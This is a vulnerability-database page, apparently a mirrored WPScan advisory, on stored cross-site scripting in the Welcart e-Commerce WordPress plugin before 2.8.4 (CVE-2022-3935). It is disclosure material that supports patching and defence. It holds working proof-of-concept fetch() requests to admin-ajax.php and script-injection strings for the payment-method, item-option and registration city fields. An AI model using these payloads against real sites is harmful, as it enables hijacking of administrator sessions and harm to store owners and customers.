Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitLana CodesWPEX-ID:906C5122-DD6D-494B-B66C-4162E234EA05
HistoryNov 21, 2022 - 12:00 a.m.

Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting

2022-11-2100:00:00
Lana Codes
114
vulnerability
cross-site scripting
welcart e-commerce

0.001 Low

EPSS

Percentile

25.0%

JSON

The plugin does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks

add new payment method with XSS exploit:

fetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=payment_ajax&newname=XSS+Payment&newexplanation=<script>alert("XSS")</script>&newsettlement=acting&newmodule=payment_module'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

The exploit requires at least a subscriber role.

The alert script displayed on the 3. Shipping and Payment tab on the shopping cart page.
Cart URL: http://localhost/usces-cart/

---

add item option with XSS exploit:

fetch('http://localhost/tester-wp/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=item_option_ajax&ID=100&update=1&optname=radio_button&optvalue=%3Cscript%3Ealert(%22radio+button+option+XSS%22)%3C%2Fscript%3E&optmeans=1&optessential=1&sort=0&optmetaid=1'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

If we want to add it as a common option, the ID will be the Cart page id (#100 cart page id). This post id is public data.

Then, if the admin selects the option from the list in the "options for items" metabox when editing the product, the script will run.

---

User registration is XSS vulnerable.

Add a product to the cart, then go to the cart: http://localhost/usces-cart/

Enter the following code for the city:
"><script>alert(1)</script>

The edit fields are escaped on the admin (for example on user edit page, or order edit page), so the alert script is not displayed. However, if the admin makes changes to the user, the script is added to the log, and the output from the log no longer the escaped, so the alert script runs.

In this case, an admin reaction to the XSS exploit is required.

Related

patchstack 1
nvd 1
cve 1
cvelist 1
wpvulndb 1
prion 1
patchstack
patchstack
WordPress Welcart e-Commerce plugin <= 2.8.3 - Multiple Auth. Stored Cross-Site Scripting (XSS) vulnerabilities
2022-11-21 00:00:00
nvd
nvd
CVE-2022-3935
2022-12-12 18:15:12
cve
cve
CVE-2022-3935
2022-12-12 18:15:12
cvelist
cvelist
CVE-2022-3935 Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting
2022-12-12 17:54:42
wpvulndb
wpvulndb
Welcart e-Commerce < 2.8.4 - Multiple Subscriber+ Stored Cross-Site Scripting
2022-11-21 00:00:00
prion
prion
Cross site scripting
2022-12-12 18:15:00

0.001 Low

EPSS

Percentile

25.0%

JSON
Related for WPEX-ID:906C5122-DD6D-494B-B66C-4162E234EA05
patchstack1nvd1cve1cvelist1wpvulndb1prion1